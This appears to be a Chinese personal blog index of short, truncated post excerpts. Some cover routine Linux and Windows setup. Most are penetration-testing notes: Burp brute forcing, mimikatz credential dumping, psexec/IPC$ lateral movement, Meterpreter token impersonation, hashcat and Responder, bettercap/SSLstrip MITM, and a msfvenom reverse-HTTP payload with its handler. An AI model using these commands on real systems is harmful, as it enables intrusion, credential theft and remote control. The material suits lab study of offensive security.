qq_44881113的博客

一个是版本问题 换个版本。这个傻吊问题两个原因。

查看当前java版本java -version查看jdk名称rpm -qa | grep jdk卸载jdkrpm -e --nodeps jdk1.8-1.8.0_xxxxxxxx安装新版本yum install java-11-openjdk* -y

查看当前mtu大小ifconfig | grep mtu或者ip a | grep mtu临时更改mtu大小（默认大小为1500）ifconfig < Interface_name > mtu < mtu_size > up或者ifconfig < Interface_name > mtu < mtu_size >ifconfig tun0 mtu 1200...

tesseract的windows版本下载地址https://github.com/UB-Mannheim/tesseract/wiki下面是自动读取Web For Pentester II中的Captcha 第六关的python代码#需要安装tesseractfrom PIL import Imagefrom urllib.error import *from urllib.request import *from urllib.parse import *import subproce

第一步抓包把Basic 后面的密文进行解码YWRtaW46YWRtaW4=使用Base64进行解码 发现格式为 admin:admin然后使用burp里面的intruder模块进行爆破首先设置payload的位置第二步设置payloads原始的格式是 admin:admin我们应该将这个分为三部分第一部分 username admin第二部分 ：第三部分 password admin在设置payload的时候 我们也应该对应设置payload类型我们设置为cust.

id_rsa文件的权限太高了，降低它的权限就可以连接了chmod 000 id_sra

dnsmasq下载地址：https://github.com/felixonmars/dnsmasq-china-listDNSmasq是一个小巧且方便地用于配置DNS和DHCP的工具，适用于小型网络，它提供了DNS功能和可选择的DHCP功能。 它服务那些只在本地适用的域名，这些域名是不会在全球的DNS服务器中出现的kali安装dnsmasqapt-get install dnsmasq在hosts文件中，没有通配符的概念（即泛解析），所以需要我们一个ip对应一个域名，如果要一个ip要对应多个子域

我出现这个问题的原因是传递给json.loads的数据不符合json格式引起的strapiVersion = json.loads(s.get("{}/admin/strapiVersion".format(strapiUrl)).text)这样直接传递就会报错raise JSONDecodeError(“Expecting value”, s, err.value) from Nonejson.decoder.JSONDecodeError: Expecting value: line 1 c

出现上述问题解决办法：第一步cd /etc/apt/ #进入该目录检查是否存在sources.list ，如果不存在，就自己新建一个，里面内容是kali的镜像源，自己网上搜#如果有类似 【sources.list~】 ，这种跟sources.list 混淆的文件，把它删除第二步vim /etc/apt/sources.list #进入该文件，检查镜像源是否正确 ，格式是否正确...

/usr/share/webshells/

kali自带python2python --version #查看python版本安装pipwget https://bootstrap.pypa.io/pip/2.7/get-pip.py #下载pippython get-pip.py #安装pippython -m pip -V #查看安装pip的版本

设置字体大小User options>display>font size抓包端口设置proxy>options>add浏览器设置firefox添加组件proxyswitchyomega配置proxyswitchyomega添加证书进入http://burp ,下载证书重要：下载的证书后缀是der 要改成cer导入证书setting>preferences>privacy>certificates>view certific

在终端下:复制命令:Ctrl + Shift + C粘贴命令:Ctrl + Shift + V在控制台下:复制命令:Ctrl + Insert 或 用鼠标选中即是复制粘贴命令:Shift + Insert 或 单击鼠标滚轮即为粘贴命令模式（能复制很多东西）命令模式就是在你所处的任意模式按ESC键,都可以会到命令行模式,Ctrl+C 复制Ctrl+V 粘贴Ctrl+X 剪切Ctrl+D删除Ctrl快捷键Ctrl+S保存Ctrl+W关闭程序Ctrl+N新建Ctrl+O打开Ct

在本机生成ssh公钥ssh-keygen -t rsa密码可以设置，也可以不设置，我们要复制公钥。cd /root/.ssh/ #进入id_rsa.pub 所在的目录cat id_rsa.pub #打开id_rsa.pub 复制公钥将公钥保存到目标机的authorized_keys里面（不同的linux系统 authorized_keys的位置不太一样）/home/ubuntu/.ssh #ubuntu的位置echo 'ssh-rsa AAAAB3NzaC1yc

0x01 获取本地帐户密码1.1 本地执行下载mimikatz程序，找到自己系统对应的位数，右键以管理员身份运行：（不是管理员会报错）#提升权限privilege::debug#抓取密码sekurlsa::logonpasswords当目标为win10或2012R2以上时，默认在内存缓存中禁止保存明文密码，但可以通过修改注册表的方式抓取明文。cmd修改注册表命令：reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProvider

WMI，是Windows 2K/XP管理系统的核心；对于其他的Win32操作系统，WMI是一个有用的插件。WMI以CIMOM为基础，CIMOM即公共信息模型对象管理器（Common Information Model Object Manager），是一个描述操作系统构成单元的对象数据库，为MMC和脚本程序提供了一个访问操作系统构成单元的公共接口。有了WMI，工具软件和脚本程序访问操作系统的不同部分时不需要使用不同的API；相反，操作系统的不同部分都可以插入WMI。使用 wmic 远程执行命令，在远程系.

下载地址：https://github.com/SecureAuthCorp/impacket.gitImpacket 是一组用于处理网络协议的 Python 类。用于对SMB1-3或IPv4 / IPv6 上的TCP、UDP、ICMP、IGMP，ARP，IPv4，IPv6，SMB，MSRPC，NTLM，Kerberos，WMI，LDAP等协议进行低级编程访问。具体协议如下Ethernet, Linux “Cooked” capture.IP, TCP, UDP, ICMP, IGMP, ARP.

windows 10 自带有wmic1 找到wmic的位置C:\Windows\System32\wbem2 添加到环境变量里我的电脑>属性>高级系统设置>高级>环境变量>找到系统变量path>编辑>将wmic的路径添加进去3重启电脑

psexec 是 windows 下非常好的一款远程命令行工具。psexec的使用不需要对方主机开方3389端口，只需要对方开启admin$共享 (该共享默认开启)。但是，假如目标主机开启了防火墙，psexec也是不能使用的，会提示找不到网络路径。由于psexec是Windows提供的工具，所以杀毒软件将其列在白名单中。但是PsExec在内网中大杀四方后，很多安全厂商开始将PsExec加入了黑名单下载地址：https://docs.microsoft.com/zh-cn/sysinternals/dow.

IPC$(Internet Process Connection) 是为了让进程之间通信的一种“管道”，通过提供用户名密码建立了一条安全的、加密的、用于数据交换的通道。关于IPC$+计划任务的横向，我们的目的非常明确：（1）首先建立向目标主机的IPC$连接（2）其次把命令执行的脚本传到目标主机（3）再次创建计划任务在目标机器上执行命令脚本（4）最后过河拆桥删除IPC$连接当然想要用IPC$来横向是有条件的：（1）目标机器没有禁用IPC连接，没有什么防火防盗拦截IPC连接，没有什么防火防盗拦.

漏洞范围：Linux内核 >= 2.6.22（2007年发行，到2016年10月18日才修复）以下是主流发行版修复之后的内核版本，如果你的内核版本低于列表里的版本，表示还存在脏牛漏洞Centos7 /RHEL7 3.10.0-327.36.3.el7Cetnos6/RHEL6 2.6.32-642.6.2.el6Ubuntu 16.10 4.8.0-26.28Ubuntu 16.04 4.4.0-45.66Ubuntu 14.04

nohup 命令表示 不挂断运行;$ 加在运行命令最后 表示后台运行;nohup ./shell.elf &

导入项目1.右击项目，选择Run As - Maven clean2.右击项目，选择Run As - Maven install3.成功后 会在项目的target文件夹下生成jar包4.将打包好的jar包 发布到服务器，运行java -jar jar包5.或者使用命令nohup java -jar jar包，nohup命令可以后台启动jar,如果 直接运行 java -jar 则关闭终端，spring的进程也会关闭。jar包方式启动，也就是使用spring boot内置的tomcat运

一：systeminfo 二：wmic qfe get caption,description,hotfixid,installedon

use incognitolist_tokens -u#显示可用的token可以看见我们已经获取了一个系统管理员的授权令牌WIN-GMDFGOL4157\Administratorimpersonate_token WIN-GMDFGOL4157\\Administrator#在incognito中调用impersonate_token命令假冒administrator用户进行攻击（注意在输入token时 中间是两个反斜杠 impersonate_token WIN-GMDFGOL41

在msf拿到会话后getuid #查看当前用户 ps #获取目标主机正在运行的进程getpid #查看meterpreter shell的进程号然后使用migrate 1692命令将shell移到PID为1692的explorer.exe进程里，因为该进程是一个稳定的应用。migrate 1692 #迁移进程再次查看进程发现已经改变进程迁移后 原来的pid的2496会自动关闭，如果没有关闭输入 kill 2496 关闭进程kill 2496 #关闭进程run post

模块功能auxiliary/scanner/portscan端口扫描auxiliary/scanner/smb/smb_versionSMB系统版本扫描auxiliary/scanner/smb/smb_enumusersSMB枚举auxiliary/scanner/smb/smb_loginSMB弱口令扫描auxiliary/admin/smb/psexec_commandSMB登录且执行命令auxiliary/scanner/ssh/ssh_l...

apt-get update #只更新软件包的索引源，作用是同步源的软件包的索引信息，从而进行软件更新apt-get upgrade #升级系统上安装的所有软件包，若更新失败，所涉及的包会保持更新之前的状态apt-get dist-upgrade #升级整个linux系统（不仅能够升级所有已安装的软件包，而且会处理升级过程中可能会出现的软件冲突。某些情况下，它的部分升级过程需要人工参与）apt-get install soft_name #安装软件...

hashcat是世界上最快、最先进的密码恢复实用程序，支持针对 300 多种高度优化的哈希算法的五种独特攻击模式。hashcat 目前支持 Linux、Windows 和 macOS 上的 CPU、GPU 和其他硬件加速器，并具有帮助启用分布式密码破解的工具。-h #查看使用-m #指定hash类型-a #攻击模块hashcat -m 5600 w::DESKTOP-75AQPA5:2ce8cf18e7c62a8b:304F04A46CF0F3249E628FB0F64D1D6F:01010000

Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffixResponder 是一款可以在局域网模拟各种服务器的内网渗透神器其可以在局域网中进行 DNS 欺骗、LLMNR 欺骗等，实现对用户 NTLM 口令的探测以及 DNS 钓鱼同时其还可以模拟包括 FTP、HTTP 在内的多

windows 木马msfvenom -p windows/meterpreter/reverse_http lhost=192.168.1.128 lport=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f exe>shell.exe监听msfconsoleuse exploit/multi/handlerset payload windows/meterpreter/reverse_https

1第一种安装需要设置代理 不然访问的时候一直加载中

Bettercap是一个非常强大、灵活可移植的中间人攻击框架，它具有跨平台、轻量级以及模块化等优点，在渗透测试过程中能够非常好的进行中间人测试。 在Kali Linux上可以通过apt install bettercap直接安装实验环境：攻击机kali ：192.168.1.128win7：192.168.1.133网关：192.168.1.2kali安装：apt-get install bettercap 最新版本的有点问题 【版本你自己选】apt-cache madison soft_

SSLStrip 攻击SSLstrip 也叫 https 降级攻击，攻击者拦截用户流量后，欺骗用户与攻击者进行 http 通信，攻击者与服务器保持正常通信 (http 或 https)，从而获取用户信息。攻击原理 通过中间人攻击监听 http 流量(自己试验可以通过设置 http 代理) 更改重定向链接中的 location，替换 https 为 http，并记录 更改响应内容中的超链接，替换 https 为 http，并记录 与用户进行 http 通信，与服务器进行 https 通信(记录中本应是 h

Shift+PageDown #键盘上PageDown可能是PgDn上页Shift+PageUp #键盘上PageDown可能是PgUp下页

tcpdump能够分析网络行为，性能和应用产生或接收网络流量。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息，从而使用户能够进一步找出问题的根源。也可以使用 tcpdump 的实现特定目的，例如在路由器和网关之间拦截并显示其他用户或计算机通信。通过 tcpdump 分析非加密的流量，如Telnet或HTTP的数据包，查看登录的用户名、密码、网址、正在浏览的网站内容，或任何其他信息。因此系统中存在网络分析工具主要不是对本机安全的威胁，而是对网络上的

1官网 https://golang.org/选择版本2下载好了 双击打开 一直点next就行了 【它会自动帮你配置环境变量】3刚开始运行可能会出现错误go.mod file not found in current directory or any parent directory; see 'go help modules'此时要初始化Go moudle解决方法go env -w GO111MODULE=auto...

数据类型指出函数调用失败的值VOID这个函数不可能失败。只有极少数Windows函数的返回值类型为VOIDBOOL如果函数失败，返回值为0;否则，返回值是一个非0值。应避免测试返回值是否为TRUE;最稳妥的做法是检查它是否不为FALSEHANDLE如果函数失败，则返回值通常为NULL;否则，HANDLE将标识一个可以操纵的对象。请注意这种返回值，因为某些函数会返回为INVALID HANDLE VALUE的一个句柄值，它被定义为-1。函数的Platform SDK文档清...

1在计算机上启动 Windows PowerShell 时，执行策略很可能是 Restricted（默认设置）。 Restricted 执行策略不允许任何脚本运行。 有关 Windows PowerShell 执行策略的详细信息，请参阅 about_Execution_Policy。2使用管理员身份打开powershell了解 计算机上的现用执行策略，打开PowerShell 然后输入 get-executionpolicyget-executionpolicy3开启power